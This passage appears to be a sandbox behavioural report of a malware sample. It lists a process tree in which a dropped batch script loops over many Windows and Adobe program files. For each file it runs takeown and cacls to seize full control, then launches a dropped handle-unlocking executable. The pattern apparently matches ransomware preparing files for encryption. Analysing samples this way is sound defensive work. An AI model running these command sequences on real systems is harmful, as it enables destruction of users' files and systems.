- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "engphon.env" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2296
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "engphon.env" -nobanner
      4⤵
      Executes dropped EXE
      PID:2304
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  - Loads dropped DLL
  PID:2340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:2392
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  - Loads dropped DLL
  PID:2424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:2448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    PID:2460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2468
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:2480
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:2512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\JNTFiltr.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2560
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2568
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:2600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2652
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2660
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:2692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2740
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2748
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:2780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\jnwmon.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2828
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:2872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2948
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2956
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""
  2⤵
  - Loads dropped DLL
  PID:3028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Month_Calendar.jtp" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Month_Calendar.jtp" -nobanner
      4⤵
      Executes dropped EXE
      PID:1524
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:2136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2096
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2176
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:2208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2184
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2172
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:2276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2272
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2352
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:2380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:2388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:2360
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:2340
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui""
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:2432
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:2524
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:2580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2612
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2624
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:2652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:2604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:2720
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:2736
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  PID:2772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    PID:660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      PID:1788
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:1396
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui""
  2⤵
  PID:688
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:808
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""
  2⤵
  PID:2160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:2836
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:2848
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui""
  2⤵
  PID:2784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\JNTFiltr.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:1336
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:1768
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui""
  2⤵
  PID:2988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:3052
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:1256
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui""
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:2124
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""
  2⤵
  PID:2188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "Music.jtp" -nobanner
    3⤵
    PID:2136
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "Music.jtp" -nobanner
      4⤵
      PID:2128
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1584
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\fr-FR\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:2208
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:2328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2292
  - - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
      b3EHwRvV.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2304
- - C:\Users\Admin\AppData\Local\Temp\b3EHwRvV.exe
    b3EHwRvV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\BWRi7ag0.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:2412
- - C:\Windows\SysWOW64\cacls.exe
